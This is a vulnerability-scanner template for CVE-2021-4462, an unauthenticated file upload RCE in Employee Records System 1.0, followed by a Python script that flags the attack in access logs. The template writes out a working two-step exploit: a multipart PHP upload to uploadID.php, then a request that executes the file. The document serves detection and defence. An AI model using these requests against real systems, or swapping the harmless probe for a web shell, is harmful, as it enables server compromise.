Vulnerability Description
Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
id: CVE-2021-4462

info:
  name: Employee Records System 1.0 - Unauthenticated File Upload RCE
  author: josephttd
  severity: critical
  description: |
    Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files via uploadID.php and achieve remote code execution, leading to complete server compromise.
  remediation: |
    Apply security patches or upgrade to a later version of Employee Records System.
  reference:
    - https://www.exploit-db.com/exploits/49596
    - https://www.sourcecodester.com/php/11393/employee-records-system.html
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cwe-id: CWE-434
    epss-score: 0.20473
    epss-percentile: 0.95383
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2021,employee-records,fileupload,rce,intrusive,vkev

variables:
  string: "CVE-2021-4462"
  filename: "{{to_lower(rand_base(5))}}.php"

http:
  - raw:
      - |
        POST /dashboard/uploadID.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="employee_ID"; filename="{{filename}}"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__); ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

      - |
        GET /uploads/employees_ids/{{upload_filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: upload_filename
        part: body
        internal: true
        group: 1
        regex:
          - '"upload_filename":"([^"]+)"'

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{md5(string)}}")'
        condition: and
# digest: 4a0a00473045022003dbc2dd756132bfe6f4f689947b42443e1d0206c8b6206d0af67887ef1d4091022100fd0811dde2805d6069b9aa96e3234457a8b689b85217f9c1394d1aedd779a1b8:922c64590222798bb761d5b6d8e72950
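The template above exercises the bug in two steps: a multipart POST to /dashboard/uploadID.php, then a GET of the stored file under /uploads/employees_ids/. Because the probe payload deletes itself with unlink(__FILE__), scanning the upload directory after the fact finds nothing, so the durable detection artefact is the web server access log. The following Python is an added example (not part of the template or the Employee Records System project) that flags this POST-then-GET pattern; the log lines and client addresses are constructed for illustration.

```python
import re

# Constructed combined-format access log lines modelled on the template's two
# requests: a client POSTs to uploadID.php, then fetches the stored file.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /dashboard/uploadID.php HTTP/1.1" 200 96 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /uploads/employees_ids/kq2zd.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:05:10 +0000] "POST /dashboard/uploadID.php HTTP/1.1" 200 96 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:05:11 +0000] "GET /uploads/employees_ids/badge.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2024:12:07:00 +0000] "GET /uploads/employees_ids/x.php HTTP/1.1" 404 210 "-" "curl/8.0"
"""

# ip, method, request path and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/dashboard/uploadID.php"
# A file with a PHP-executable extension served out of the upload directory.
SERVED_SCRIPT_RE = re.compile(
    r"^/uploads/employees_ids/[^/?]+\.(?:php\d?|phtml|phar)(?:\?.*)?$", re.IGNORECASE
)


def find_upload_rce(log_text):
    """Return (ip, path) pairs where a client POSTed to uploadID.php and later
    received a 200 for a script-typed file from the upload directory.

    A GET for an image (the legitimate use of the directory), a 404, or a GET
    from a client that never hit the upload endpoint is not reported.
    """
    uploaders = set()
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than fail
        ip, method, path, status = m.group("ip", "method", "path", "status")
        if method == "POST" and path.split("?", 1)[0] == UPLOAD_ENDPOINT:
            uploaders.add(ip)
        elif (method == "GET" and status == "200" and ip in uploaders
              and SERVED_SCRIPT_RE.match(path)):
            hits.append((ip, path))
    return hits


if __name__ == "__main__":
    for ip, path in find_upload_rce(SAMPLE_LOG):
        print(f"possible CVE-2021-4462 exploitation from {ip}: {path}")
```

On the constructed sample only 203.0.113.7 is reported; a stricter deployment would also require the upload to be in the same short time window and would alert on any 200 for a .php path under the upload directory regardless of client.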